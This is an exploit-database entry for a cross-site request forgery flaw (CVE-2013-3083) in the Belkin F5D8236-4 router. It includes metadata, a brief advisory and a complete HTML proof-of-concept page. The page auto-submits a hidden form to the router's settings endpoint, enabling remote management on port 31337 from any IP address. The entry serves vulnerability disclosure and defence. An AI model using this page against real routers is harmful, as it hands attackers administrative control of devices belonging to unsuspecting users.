EXPLOITS

Belkin F5D8236-4 Router - Cross-Site Request Forgery

Author: Jacob Holcomb
type: remote
platform: hardware
port: 
date_added: 2013-04-25  
date_updated: 2015-10-19  
verified: 1  
codes: CVE-2013-3083;OSVDB-92551  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 38495.html  

source: https://www.securityfocus.com/bid/59476/info

Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.

<html> <head> <title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title> <!-- Use JavaScript debugging to bypass authentication --> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" method="post"/> <input type="hidden" name="remote_mgmt_enabled" value="1"/> <input type="hidden" name="remote_mgmt_port" value="31337"/> <input type="hidden" name="allow_remote_ip" value="0"/> </form> <script> function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); </script> <body> </html>